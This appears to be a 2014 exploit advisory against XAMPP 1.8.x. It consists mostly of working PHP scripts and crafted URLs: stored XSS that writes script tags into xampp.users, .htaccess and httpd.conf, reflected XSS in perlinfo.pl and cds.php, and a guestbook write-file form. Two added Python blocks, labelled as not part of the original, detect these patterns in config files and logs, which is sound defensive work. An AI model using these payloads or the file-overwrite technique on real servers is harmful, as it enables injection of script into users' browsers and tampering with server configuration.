#Exploit Name : XAMPP 1.8.x Multiple Vulnerabilities
#Author : DevilScreaM
#Date : 6 October 2014
#Vendor : http://bitnami.com
#Version : 1.8.x or Higher Version
#Operating System : Windows / Linux
#Vulnerability : Cross Site Scripting / Write File
#Type : #WebApps #Application
#Tested : Windows 7 64 Bit
#Thanks : Newbie-Security, Indonesian Hacker Team, Indonesia Coder Team, Indonesia Security Team
Cross Site Scripting at perlinfo.pl #1
Perl Version : 5.16.3
Script For Exploit
For Localhost
<?php
// Payload becomes the user name field of an htpasswd-style "user:password" line.
$xss = "<script>alert('Tested by DevilScreaM')</script>:";
$f = @fopen('C:\xampp\security\xampp.users','w');
fwrite($f , $xss);
// .htaccess that enables Basic auth against the file written above.
$htcs = 'AuthName "Username = your Script XSS"
AuthType Basic
AuthUserFile "C:\xampp\security\xampp.users"
require valid-user';
$f1 = @fopen('C:\xampp\htdocs\xampp\.htaccess','w');
fwrite($f1 , $htcs);
?>
<script>
window.location = "http://127.0.0.1/xampp/perlinfo.pl"
</script>
==================================================================
For Site
<?php
// Payload becomes the user name field of an htpasswd-style "user:password" line.
$xss = "<script>alert('Tested by DevilScreaM')</script>:";
$f = @fopen('my.users','w');
fwrite($f , $xss);
$htcs = 'AuthName "Username = your Script XSS"
AuthType Basic
AuthUserFile "my.users"
require valid-user';
$f1 = @fopen('.htaccess','w');
fwrite($f1 , $htcs);
// A perlinfo.pl script, written next to the .htaccess above.
$pl = '#!"perl\bin\perl.exe"
use HTML::Perlinfo;
use CGI qw(header);
$q = new CGI;
print $q->header;
$p = new HTML::Perlinfo;
$p->info_general;
$p->info_variables;
$p->info_modules;
$p->info_license;';
$f2 = @fopen('perlinfo.pl','w');
fwrite($f2 , $pl);
?>
<script>
window.location = "http://site.com/perlinfo.pl"
</script>
==================================================================
Save the script as C:\xampp\htdocs\xss.php
Open a browser and load http://127.0.0.1/xss.php
You will be redirected to http://127.0.0.1/xampp/perlinfo.pl
Auth Login
Username : <script>alert('Tested by DevilScreaM')</script>
Password :
===================================================================
Cross Site Scripting at perlinfo.pl Query String #2
Exploit :
http://127.0.0.1/xampp/perlinfo.pl?[XSS]
http://127.0.0.1/xampp/perlinfo.pl?[XSS]=[XSS]
Example
http://127.0.0.1/xampp/perlinfo.pl?<script>alert('DevilScreaM')</script>=<script>alert('Newbie-Security')</script>
====================================================================
Cross Site Scripting at http://127.0.0.1/xampp/perlinfo.pl #3
Exploit :
1. Go To Directory C:\xampp\apache\conf\
2. Edit File httpd.conf
3. Go To Line 209
Edit ServerAdmin [email protected] to
ServerAdmin [YOUR XSS]
Example :
ServerAdmin <h1>DevilScreaM</h1>
4. Save File
5. See your XSS at
http://127.0.0.1/xampp/perlinfo.pl
====================================================================
Cross Site Scripting at http://127.0.0.1/Webalizer/
Script for Exploit :
<?php
$xss = "<script>alert('Tested by DevilScreaM')</script>:";
$f = @fopen('C:\xampp\security\xampp.users','w');
fwrite($f , $xss);
?>
<script>
window.location = "http://127.0.0.1/webalizer/usage_[YEARS][MONTH].html"
</script>
Information :
usage_[YEARS][MONTH].html => usage_201410.html
====================================================================
Save the script as Webalizer.php
Command
@echo off
C:\xampp\webalizer\webalizer.exe -c C:\xampp\webalizer\webalizer.conf
PHP
<?php
// Single quotes: in a double-quoted string "\xa" would be parsed as a hex escape.
$webalizer = 'C:\xampp\webalizer\webalizer.bat';
system($webalizer);
?>
=====================================================================
Save the script as webalizer.cmd or webalizer_run.php
Run webalizer.cmd and wait for the process to finish
Result
http://127.0.0.1/webalizer/usage_[years][month].html
Example
http://127.0.0.1/webalizer/usage_201410.html
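Added example, not part of the original advisory: the stored cases above (#1, #3 and Webalizer) all start from markup placed in xampp.users, .htaccess or httpd.conf, so a defender can audit those files for it. Function names and the sample file contents are assumptions constructed for illustration.

```python
import re

# Directives the advisory shows carrying markup into rendered pages.
DIRECTIVE = re.compile(r'^\s*(AuthName|ServerAdmin)\s+(.*)$', re.IGNORECASE)
MARKUP = re.compile(r'[<>]')

def audit_apache_config(text):
    """Return [(line_no, directive, value)] for directive values containing < or >."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        m = DIRECTIVE.match(line)          # commented-out lines never match
        if m and MARKUP.search(m.group(2)):
            findings.append((no, m.group(1), m.group(2).strip()))
    return findings

def audit_user_file(text):
    """Return [(line_no, user)] for user:hash entries whose line contains < or >.

    Hashed passwords written by htpasswd use an alphabet without angle
    brackets, so a hit points at an entry that was written some other way.
    """
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        if MARKUP.search(line):
            findings.append((no, line.split(':', 1)[0]))
    return findings

# Constructed samples: one clean entry and one entry as the advisory writes it.
SAMPLE_CONF = '''\
# constructed httpd.conf / .htaccess excerpt
ServerName localhost:80
ServerAdmin <h1>DevilScreaM</h1>
AuthName "xampp user"
AuthType Basic
'''
SAMPLE_USERS = """\
xampp:$apr1$constructed$notarealhashvalue000000
<script>alert('Tested by DevilScreaM')</script>:
"""

if __name__ == '__main__':
    for finding in audit_apache_config(SAMPLE_CONF):
        print('config', finding)
    for finding in audit_user_file(SAMPLE_USERS):
        print('users ', finding)
```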
==================================================================
Cross Site Scripting at cds.php
Exploit :
http://127.0.0.1/xampp/cds.php?interpret=[XSS]
Example :
http://127.0.0.1/xampp/cds.php?interpret=<script>alert('Tested by DevilScreaM')</script>
====================================================================
Write File Vulnerability
Script to Exploit :
<form action='http://127.0.0.1/xampp/guestbook-en.pl' method='get'>
<table border='0' cellpadding='0' cellspacing='0'>
<tr><td>TEXT:</td>
<td><input type='text' size='30' value='Tested by DevilScreaM' name='f_name'></td></tr>
<tr><td></td><td><input type='submit' value='WRITE'></td></tr>
</table></form>
<br><br>
<a href="http://127.0.0.1/xampp/guestbook.dat"><b>Result</b></a>
==================================================================
Save the script with a .html extension
Open the script and click Write, or change the text
Result
http://127.0.0.1/xampp/guestbook.dat
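Added example, not part of the original advisory: a detection pass over Apache access-log lines for the request-borne cases above (markup in the query string of perlinfo.pl or cds.php, and a GET to guestbook-en.pl carrying f_name). The labels, function names and log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Request field of an Apache common/combined access-log entry.
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
MARKUP = re.compile(r'[<>]')

# Endpoints the advisory reports as echoing the query string unescaped.
REFLECTING = {'/xampp/perlinfo.pl', '/xampp/cds.php'}
# Endpoint the advisory reports as writing f_name to guestbook.dat.
GUESTBOOK = '/xampp/guestbook-en.pl'

def classify(line):
    """Return a finding label for one log line, or None."""
    m = REQUEST.search(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    path = parts.path.lower()      # Windows hosts serve paths case-insensitively
    if path in REFLECTING and MARKUP.search(unquote_plus(parts.query)):
        return 'reflected-markup'
    if path == GUESTBOOK and m.group('method') == 'GET':
        keys = {k for k, _ in parse_qsl(parts.query, keep_blank_values=True)}
        if 'f_name' in keys:
            return 'guestbook-write-via-get'
    return None

def scan(lines):
    """Return [(line_number, label)] for every flagged line (1-based)."""
    return [(n, label) for n, line in enumerate(lines, 1)
            if (label := classify(line))]

# Constructed sample entries, not taken from a real server.
SAMPLE_LOG = [
    '127.0.0.1 - - [06/Oct/2014:10:00:01 +0700] "GET /xampp/perlinfo.pl HTTP/1.1" 200 51234',
    '127.0.0.1 - - [06/Oct/2014:10:00:07 +0700] "GET /xampp/cds.php?interpret=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4410',
    '127.0.0.1 - - [06/Oct/2014:10:00:09 +0700] "GET /xampp/perlinfo.pl?%3Ch1%3Ex%3C/h1%3E=%3Ch1%3Ey%3C/h1%3E HTTP/1.1" 200 51300',
    '127.0.0.1 - - [06/Oct/2014:10:00:12 +0700] "GET /xampp/guestbook-en.pl?f_name=Tested+by+DevilScreaM HTTP/1.1" 200 2100',
    '127.0.0.1 - - [06/Oct/2014:10:00:15 +0700] "GET /xampp/cds.php?interpret=Beatles HTTP/1.1" 200 4400',
]

if __name__ == '__main__':
    for n, label in scan(SAMPLE_LOG):
        print(n, label)
```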
# 0day.today [2018-04-02] #